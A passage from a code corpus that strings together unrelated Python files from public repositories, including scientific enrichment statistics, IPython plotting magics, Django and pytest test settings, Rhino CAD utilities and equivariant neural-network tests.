for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
with open(f1, "w") as f:
f.write("123")
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
assert fp1 != fp2
|
scaffoldgraph/analysis/enrichment.py | trumanw/ScaffoldGraph | 121 | 21161 | <filename>scaffoldgraph/analysis/enrichment.py
"""
scaffoldgraph.analysis.enrichment
Module contains an implementation of Compound Set Enrichment from the papers:
- Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
- Mining for bioactive scaffolds with scaffold networks: Improved compound set enrichment from primary screening data.
"""
from networkx import set_node_attributes
from scipy.stats import ks_2samp, binom_test
from loguru import logger
def _btp(scaffoldgraph, activity_key, alternative, pd):
"""CSE - binomial test (used in cse functions)."""
result, active, total = {}, 0, 0
for m, a in scaffoldgraph.get_molecule_nodes(activity_key):
if int(a) == 1:
active += 1
total += 1
if pd is None:
pd = active / total
logger.debug(f'(BTP) Total: {total}, Active: {active}, pd: {pd}')
for scaffold in scaffoldgraph.get_scaffold_nodes():
mols, acts = zip(*scaffoldgraph.get_molecules_for_scaffold(scaffold, activity_key))
N, K = len(mols), acts.count(1)
pval = binom_test(K, N, pd, alternative=alternative)
logger.debug(f'(BTP) {scaffold}, {K}, {N}, {pval}')
result[scaffold] = {'pval': pval, '_active': K, '_total': N}
return result
def _ksp(scaffoldgraph, activity_key, alternative):
"""CSE - Kolmogorov-Smirnov test (used in cse functions)."""
result, background = {}, []
for _, activity in scaffoldgraph.get_molecule_nodes(activity_key):
background.append(activity)
for scaffold in scaffoldgraph.get_scaffold_nodes():
mols, acts = zip(*scaffoldgraph.get_molecules_for_scaffold(scaffold, activity_key))
N = len(mols)
dmax, pval = ks_2samp(acts, background, alternative, 'auto')
logger.debug(f'(KSP) {scaffold}, {N}, {dmax}, {pval}')
result[scaffold] = {'pval': pval, 'dmax': dmax, '_total': N}
return result
def bonferroni_correction(scaffoldgraph, crit):
"""Returns bonferroni corrected significance level for each hierarchy.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
crit : float
The critical significance value to apply bonferroni correction at
each scaffold hierarchy.
Returns
-------
dict
A dictionary containing the corrected critical significance value
at each scaffold hierarchy {hierarchy: crit}.
"""
hier = scaffoldgraph.get_hierarchy_sizes()
return {k: crit / v for k, v in hier.items()}
def calc_scaffold_enrichment(scaffoldgraph, activity, mode='ks', alternative='greater', p=None):
"""
Calculate scaffold enrichment using the Kolmogorov-Smirnov or binomal test.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
activity : str
A scaffold node attribute key corresponding to an activity value.
If the test is binomial this value should be a binary attribute
(0 or 1 / True or False).
mode : {'ks', 'b'}, optional
A string specifying the statistical test to perform. 'ks' specifies a
Kolmogorov-Smirnov test and 'b' or 'binomial' specifies a binomial test.
The default is 'ks'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available:
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
The default is 'greater'.
p : float, None, optional
The hypothesized probability of success. 0 <= p <= 1. Used in binomial mode.
If not specified p is set automatically (number of active / total compounds).
The default is None.
Returns
-------
dict
A dict of dicts in the format {scaffold: {results}} where results is the set
of results returned by the statistical test and scaffold is a scaffold node
key corresponding to a scaffold in the ScaffoldGraph object.
See Also
--------
scaffoldgraph.analysis.enrichment.compound_set_enrichment
References
----------
.. [1] <NAME>., <NAME>., <NAME>., and <NAME>. (2011). Mining for bioactive scaffolds
with scaffold networks: Improved compound set enrichment from primary screening data.
Journal of Chemical Information and Modeling, 51(7), 1528–1538.
.. [2] <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (2010)
Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
Journal of Chemical Information and Modeling, 50(12), 2067-2078.
"""
if mode == 'binomial' or mode == 'b':
return _btp(scaffoldgraph, activity, alternative, p)
elif mode == 'ks' or mode == 'k':
return _ksp(scaffoldgraph, activity, alternative)
else:
raise ValueError(f'scaffold enrichment mode: {mode}, not implemented')
def compound_set_enrichment(scaffoldgraph, activity, mode='ks', alternative='greater', crit=0.01, p=None):
"""
Perform compound set enrichment (CSE), calculating scaffolds enriched for bioactivity.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
activity : str
A scaffold node attribute key corresponding to an activity value.
If the test is binomial this value should be a binary attribute
(0 or 1 / True or False).
mode : {'ks', 'b'}, optional
A string specifying the statistical test to perform. 'ks' specifies a
Kolmogorov-Smirnov test and 'b' or 'binomial' specifies a binomial test.
The default is 'ks'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available:
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
The default is 'greater'.
crit : float, optional
The critical significance level. The default is 0.01
p : float, None, optional
The hypothesized probability of success. 0 <= p <= 1. Used in binomial mode.
If not specified p is set automatically (number of active / total compounds).
The default is None.
Returns
-------
A tuple of 'enriched' scaffold classes in the format: (scaffold, {data}) where data
is the corresponding node attributes for the returned scaffold.
Notes
-----
P-values are added as node attributes with the key 'pval'.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., and <NAME>. (2011). Mining for bioactive scaffolds
with scaffold networks: Improved compound set enrichment from primary screening data.
Journal of Chemical Information and Modeling, 51(7), 1528–1538.
.. [2] <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (2010)
Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
Journal of Chemical Information and Modeling, 50(12), 2067-2078.
"""
set_node_attributes(scaffoldgraph, calc_scaffold_enrichment(scaffoldgraph, activity, mode, alternative, p))
bonferroni = bonferroni_correction(scaffoldgraph, crit)
result = []
for scaffold, data in scaffoldgraph.get_scaffold_nodes(True):
if data['pval'] < bonferroni[data['hierarchy']]:
result.append((scaffold, data))
return tuple(sorted(result, key=lambda x: x[1]['pval']))
|
python/brunel/magics.py | Ross1503/Brunel | 306 | 21163 | # Copyright (c) 2015 IBM Corporation and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython.core.magic import Magics, magics_class, line_magic, cell_magic, line_cell_magic
import pandas as pd
import brunel.brunel_main as brunel
ipy = get_ipython()
@magics_class
class BrunelMagics(Magics):
@line_cell_magic
def brunel(self, line, cell=None):
"Magic that works both as %brunel and as %%brunel"
datas = self.find_dataframes()
# print("Found dataframes", list(datas.keys()))
if cell is not None:
line = line + ' ' + cell.replace('\n',' ')
# print ("Command =", line)
data = None
height = 400
width = 500
output = 'd3'
online_js = False
parts = line.split('::')
action = parts[0].strip()
datasets_in_brunel = brunel.get_dataset_names(action)
self.cache_data(datasets_in_brunel,datas)
if len(parts) > 2:
raise ValueError("Only one ':' allowed in brunel magic. Format is 'ACTION : key=value, ...'")
if len(parts) > 1:
extras = parts[1].strip()
dataName = self.find_term('data', extras)
if dataName is not None:
try:
data = datas[dataName]
except:
raise ValueError("Could not find pandas DataFrame named '" + dataName + "'")
width = self.find_term('width', extras, width)
height = self.find_term('height', extras, height)
online_js = self.find_term('online_js', extras, online_js)
if data is None and len(datasets_in_brunel) == 0:
data = self.best_match(self.get_vars(action), list(datas.values()))
return brunel.display(action, data, width, height, online_js)
def cache_data(self, datasets_in_brunel, dataframes):
for data_name in datasets_in_brunel:
try:
data = dataframes[data_name]
brunel.cacheData(data_name, brunel.to_csv(data))
except:
pass
def find_term(self, key, string, default=None):
for expr in string.split(','):
terms = expr.split('=')
if len(terms) != 2:
raise ValueError("Bad format for key=value pair: " + expr)
if key == terms[0].strip().lower():
return terms[1].strip()
return default
def find_dataframes(self):
result = {}
for name in list(self.shell.user_ns.keys()):
v = self.shell.user_ns[name]
if name[0] != '_' and isinstance(v, pd.DataFrame):
result[name] = v
return result
def get_vars(self, line):
"Search for the internal bits of 'x(a,b)' and return as ['a','b']"
result = []
for part in line.split('('):
p = part.find(')')
if p > 0:
inner = part[:p].split(',')
for term in inner:
result.append(term.strip())
return result
def best_match(self, variables, datas):
# print("Searching for", variables, "in", len(datas), "dataframes")
all = [[self.match(variables, v.columns.values), v] for v in datas]
all.sort(key=lambda x: x[0])
return all[0][1]
def match(self, names1, names2):
n = 0
for i in names1:
for j in names2:
if str(i).lower() == str(j).lower(): n += 1
return -n
# Register with IPython
ipy.register_magics(BrunelMagics)
|
lte/gateway/python/magma/enodebd/tr069/tests/models_tests.py | Aitend/magma | 849 | 21185 | <reponame>Aitend/magma
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from magma.enodebd.tr069.models import DeviceIdStruct
from spyne import ComplexModelBase
class DeviceIdStructTests(unittest.TestCase):
def test_as_dict_memory_leak(self):
"""
Test to ensure as_dict() doesn't leak model instances
"""
thing = DeviceIdStruct(
Manufacturer='abc',
OUI='def',
ProductClass='ghi',
SerialNumber='jkl',
)
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'def',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
# inspect the spyne.util.memoize object that wraps the staticmethod
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
# should produce a different result and not grow the size of memo
thing.OUI = 'aaaa'
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'aaaa',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
# use a different object this time. Again should not grow memo
thing = DeviceIdStruct(
Manufacturer='abc',
OUI='def',
ProductClass='ghi',
SerialNumber='jkl',
)
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'def',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
|
main.py | Lasx/gb688_downloader | 119 | 21191 | <reponame>Lasx/gb688_downloader<filename>main.py<gh_stars>100-1000
from standard import HDB, NatureStd
if __name__ == "__main__":
hb = HDB('hbba')
db = HDB('dbba')
data = db.search('政务云工程评价指标体系及方法')
print(data)
# first_record = data["records"][0]
# name = f'{first_record["code"]}({first_record["chName"]}'
# db.download(pk=first_record['pk'], name=name)
# std = NatureStd()
# std.search("")
# std.download("http://www.nrsis.org.cn/portal/stdDetail/211166", "乡(镇)土地利用总体规划制图规范.pdf") # 行标
|
notebook/dict_keys_values_items.py | vhn0912/python-snippets | 174 | 21196 | <filename>notebook/dict_keys_values_items.py
d = {'key1': 1, 'key2': 2, 'key3': 3}
for k in d:
print(k)
# key1
# key2
# key3
for k in d.keys():
print(k)
# key1
# key2
# key3
keys = d.keys()
print(keys)
print(type(keys))
# dict_keys(['key1', 'key2', 'key3'])
# <class 'dict_keys'>
k_list = list(d.keys())
print(k_list)
print(type(k_list))
# ['key1', 'key2', 'key3']
# <class 'list'>
for v in d.values():
print(v)
# 1
# 2
# 3
values = d.values()
print(values)
print(type(values))
# dict_values([1, 2, 3])
# <class 'dict_values'>
v_list = list(d.values())
print(v_list)
print(type(v_list))
# [1, 2, 3]
# <class 'list'>
for k, v in d.items():
print(k, v)
# key1 1
# key2 2
# key3 3
for t in d.items():
print(t)
print(type(t))
print(t[0])
print(t[1])
print('---')
# ('key1', 1)
# <class 'tuple'>
# key1
# 1
# ---
# ('key2', 2)
# <class 'tuple'>
# key2
# 2
# ---
# ('key3', 3)
# <class 'tuple'>
# key3
# 3
# ---
items = d.items()
print(items)
print(type(items))
# dict_items([('key1', 1), ('key2', 2), ('key3', 3)])
# <class 'dict_items'>
i_list = list(d.items())
print(i_list)
print(type(i_list))
# [('key1', 1), ('key2', 2), ('key3', 3)]
# <class 'list'>
print(i_list[0])
print(type(i_list[0]))
# ('key1', 1)
# <class 'tuple'>
|
flows/tests/settings.py | sergioisidoro/django-flows | 104 | 21197 | <reponame>sergioisidoro/django-flows
import django
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = ['flows', 'flows.statestore.tests', 'django_nose']
SECRET_KEY = 'flow_tests'
if django.VERSION < (1, 6):
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = ''
if django.VERSION < (1, 7):
try:
__import__('south')
except ImportError:
pass
else:
INSTALLED_APPS.append('south')
|
python/craftassist/ttad/generation_dialogues/build_scene_flat_script.py | satyamedh/craftassist | 626 | 21217 | <reponame>satyamedh/craftassist
if __name__ == "__main__":
import argparse
import pickle
import os
from tqdm import tqdm
from build_scene import *
from block_data import COLOR_BID_MAP
BLOCK_DATA = pickle.load(
open("/private/home/aszlam/minecraft_specs/block_images/block_data", "rb")
)
allowed_blocktypes = []
count = 0
for c, l in COLOR_BID_MAP.items():
for idm in l:
allowed_blocktypes.append(BLOCK_DATA["bid_to_name"][idm])
count += 1
parser = argparse.ArgumentParser()
parser.add_argument("--target", default="/checkpoint/aszlam/minecraft/inverse_model/flat_ads/")
parser.add_argument("--N", type=int, default=10000000)
# parser.add_argument("--num_per_chunk", type=int, default=10000000)
args = parser.parse_args()
template_attributes = {"count": range(1, 5)}
template_attributes["step"] = range(1, 10)
template_attributes["non_shape_names"] = ["triangle", "circle", "disk", "rectangle"]
template_attributes["mob_names"] = ["pig", "sheep", "cow", "chicken"]
template_attributes["allowed_blocktypes"] = allowed_blocktypes
template_attributes["distribution"] = {
"MOVE": 1.0,
"BUILD": 1.0,
"DESTROY": 1.0,
"DIG": 0.8,
"COPY": 0.8,
"FILL": 0.8,
"SPAWN": 0.1,
"DANCE": 0.8,
}
scenes = []
for i in tqdm(range(args.N)):
S = build_scene(template_attributes, sl=16, flat=True)
scenes.append(S)
f = open(os.path.join(args.target, "flat_scenes_dump.pk"), "wb")
pickle.dump(scenes, f)
f.close()
|
modules/transfer/scripts/info.py | sishuiliunian/falcon-plus | 7,208 | 21218 | <gh_stars>1000+
import requests
# Copyright 2017 Xiaomi, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
d = [
{
"endpoint": "hh-op-mon-tran01.bj",
"counter": "load.15min",
},
{
"endpoint": "hh-op-mon-tran01.bj",
"counter": "net.if.in.bytes/iface=eth0",
},
{
"endpoint": "10.202.31.14:7934",
"counter": "p2-com.xiaomi.miui.mibi.service.MibiService-method-createTradeV1",
},
]
url = "http://query.falcon.miliao.srv:9966/graph/info"
r = requests.post(url, data=json.dumps(d))
print r.text
#curl "localhost:9966/graph/info/one?endpoint=`hostname`&counter=load.1min" |python -m json.tool
|
stix_shifter_modules/secretserver/stix_transmission/delete_connector.py | grimmjow8/stix-shifter | 129 | 21232 | from stix_shifter_utils.modules.base.stix_transmission.base_delete_connector import BaseDeleteConnector
class DeleteConnector(BaseDeleteConnector):
def __init__(self, api_client):
self.api_client = api_client
def delete_query_connection(self, search_id):
return {"success": True}
|
tests/test_crud/conftest.py | amisadmin/fastapi_amis_admin | 166 | 21241 | <filename>tests/test_crud/conftest.py<gh_stars>100-1000
import pytest
from tests.test_crud.main import app
@pytest.fixture(scope='session', autouse=True)
def startup():
import asyncio
# asyncio.run(app.router.startup())
loop = asyncio.get_event_loop()
loop.run_until_complete(app.router.startup())
|
src/settings.py | MichaelJWelsh/bot-evolution | 151 | 21294 | <reponame>MichaelJWelsh/bot-evolution
"""
This module contains the general settings used across modules.
"""
FPS = 60
WINDOW_WIDTH = 1100
WINDOW_HEIGHT = 600
TIME_MULTIPLIER = 1.0
|
src/compas_rhino/utilities/misc.py | XingxinHE/compas | 235 | 21305 | <gh_stars>100-1000
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import os
import sys
import ast
from compas_rhino.forms import TextForm
from compas_rhino.forms import ImageForm
import System
import rhinoscriptsyntax as rs
import Rhino
import clr
clr.AddReference('Rhino.UI')
import Rhino.UI # noqa: E402
from Rhino.UI.Dialogs import ShowMessageBox # noqa: E402
try:
from compas_rhino.forms import PropertyListForm
except ImportError:
from Rhino.UI.Dialogs import ShowPropertyListBox
__all__ = [
'wait',
'get_tolerance',
'toggle_toolbargroup',
'pick_point',
'browse_for_folder',
'browse_for_file',
'print_display_on',
'display_message',
'display_text',
'display_image',
'display_html',
'update_settings',
'update_named_values',
'screenshot_current_view',
'select_folder',
'select_file',
'unload_modules',
]
# ==============================================================================
# Truly miscellaneous :)
# ==============================================================================
def screenshot_current_view(path,
width=1920,
height=1080,
scale=1,
draw_grid=False,
draw_world_axes=False,
draw_cplane_axes=False,
background=False):
"""Take a screenshot of the current view.
Parameters
----------
path : str
The filepath for saving the screenshot.
Other Parameters
----------------
width : int, optional
height : int, optional
scale : float, optional
draw_grid : bool, optional
draw_world_axes : bool, optional
draw_cplane_axes : bool, optional
background : bool, optional
Returns
-------
bool
True if the command was successful.
False otherwise.
"""
properties = [draw_grid, draw_world_axes, draw_cplane_axes, background]
properties = ["Yes" if item else "No" for item in properties]
scale = max(1, scale) # the rhino command requires a scale > 1
rs.EnableRedraw(True)
rs.Sleep(0)
result = rs.Command("-_ViewCaptureToFile \"" + os.path.abspath(path) + "\""
" Width=" + str(width) +
" Height=" + str(height) +
" Scale=" + str(scale) +
" DrawGrid=" + properties[0] +
" DrawWorldAxes=" + properties[1] +
" DrawCPlaneAxes=" + properties[2] +
" TransparentBackground=" + properties[3] +
" _enter", False)
rs.EnableRedraw(False)
return result
def wait():
return Rhino.RhinoApp.Wait()
def get_tolerance():
"""Get the absolute tolerance.
Returns
-------
float
The tolerance.
"""
return rs.UnitAbsoluteTolerance()
def toggle_toolbargroup(rui, group):
if not os.path.exists(rui) or not os.path.isfile(rui):
return
collection = rs.IsToolbarCollection(rui)
if not collection:
collection = rs.OpenToolbarCollection(rui)
if rs.IsToolbar(collection, group, True):
rs.ShowToolbar(collection, group)
else:
if rs.IsToolbar(collection, group, True):
if rs.IsToolbarVisible(collection, group):
rs.HideToolbar(collection, group)
else:
rs.ShowToolbar(collection, group)
def pick_point(message='Pick a point.'):
point = rs.GetPoint(message)
if point:
return list(point)
return None
# ==============================================================================
# File system
# ==============================================================================
def browse_for_folder(message=None, default=None):
return rs.BrowseForFolder(folder=default, message=message, title='compas')
select_folder = browse_for_folder
def browse_for_file(title=None, folder=None, filter=None):
if filter == 'json':
filter = 'JSON files (*.json)|*.json||'
elif filter == 'obj':
filter = 'OBJ files (*.obj)|*.obj||'
elif filter == 'fofin':
filter = 'FOFIN session files (*.fofin)|*.fofin||'
else:
pass
return rs.OpenFileName(title, filter=filter, folder=folder)
select_file = browse_for_file
# ==============================================================================
# Display
# ==============================================================================
def print_display_on(on=True):
if on:
rs.Command('_PrintDisplay State On Color Display Thickness 1 _Enter')
else:
rs.Command('_PrintDisplay State Off _Enter')
def display_message(message):
return ShowMessageBox(message, 'Message')
def display_text(text, title='Text', width=800, height=600):
if isinstance(text, (list, tuple)):
text = '{0}'.format(System.Environment.NewLine).join(text)
form = TextForm(text, title, width, height)
return form.show()
def display_image(image, title='Image', width=800, height=600):
form = ImageForm(image, title, width, height)
return form.show()
def display_html():
raise NotImplementedError
# ==============================================================================
# Settings and attributes
# ==============================================================================
def update_named_values(names, values, message='', title='Update named values', evaluate=False):
try:
dialog = PropertyListForm(names, values)
except Exception:
values = ShowPropertyListBox(message, title, names, values)
else:
if dialog.ShowModal(Rhino.UI.RhinoEtoApp.MainWindow):
values = dialog.values
else:
values = None
if evaluate:
if values:
values = list(values)
for i in range(len(values)):
value = values[i]
try:
value = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
pass
values[i] = value
return values
def update_settings(settings, message='', title='Update settings'):
names = sorted(settings.keys())
values = [str(settings[name]) for name in names]
values = update_named_values(names, values, message=message, title=title)
if values:
values = list(values)
for name, value in zip(names, values):
try:
settings[name] = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
settings[name] = value
return True
return False
def unload_modules(top_level_module_name):
"""Unloads all modules named starting with the specified string.
This function eases the development workflow when editing a library that is
used from Rhino/Grasshopper.
Parameters
----------
top_level_module_name : :obj:`str`
Name of the top-level module to unload.
Returns
-------
list
List of unloaded module names.
"""
modules = filter(lambda m: m.startswith(top_level_module_name), sys.modules)
for module in modules:
sys.modules.pop(module)
return modules
|
test/nn/test_nonlinearities_fliprotations.py | steven-lang/e2cnn | 356 | 21342 | <gh_stars>100-1000
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import random
class TestNonLinearitiesFlipRotations(TestCase):
def test_dihedral_norm_relu(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_dihedral_norm_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_dihedral_pointwise_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_dihedral_pointwise_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_dihedral_gated_one_input_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_all_shuffled(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated).sorted()
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_concat_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'concatenated' in r.supported_nonlinearities]
for rep in reprs:
r = FieldType(g, [rep])
nnl = ConcatenatedNonLinearity(r, function='c_relu')
nnl.check_equivariance()
def test_dihedral_induced_norm_relu(self):
N = 9
g = FlipRot2dOnR2(N)
sg_id = (None, N)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, int(N // 2))] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 7)] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_gated(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
reprs = [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 3)] * 5
ngates = len(reprs)
reprs += [g.induced_repr(sg_id, so2.trivial_representation)] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = InducedGatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_norm_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_o2_pointwise_relu(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_o2_pointwise_sigmoid(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_o2_gated_one_input_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_one_input_all_shuffled(self):
g = FlipRot2dOnR2(-1, 10)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_o2_gated_two_inputs_shuffled_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_o2_gated_two_inputs_sorted_gated(self):
g = FlipRot2dOnR2(-1, 10)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gated = FieldType(g, gated).sorted()
gates = FieldType(g, gates)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated1_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r, g.trivial_repr])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
r1 = FieldType(g, [g.trivial_repr, r])
gates = ['gated', 'gate']
self.assertRaises(AssertionError, GatedNonLinearity1, r1, gates=gates)
def test_dihedral_gated2_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'gated' not in r.supported_nonlinearities:
gates = FieldType(g, [g.trivial_repr])
gated = FieldType(g, [r])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
for r in g.representations.values():
if 'gate' not in r.supported_nonlinearities:
gates = FieldType(g, [r])
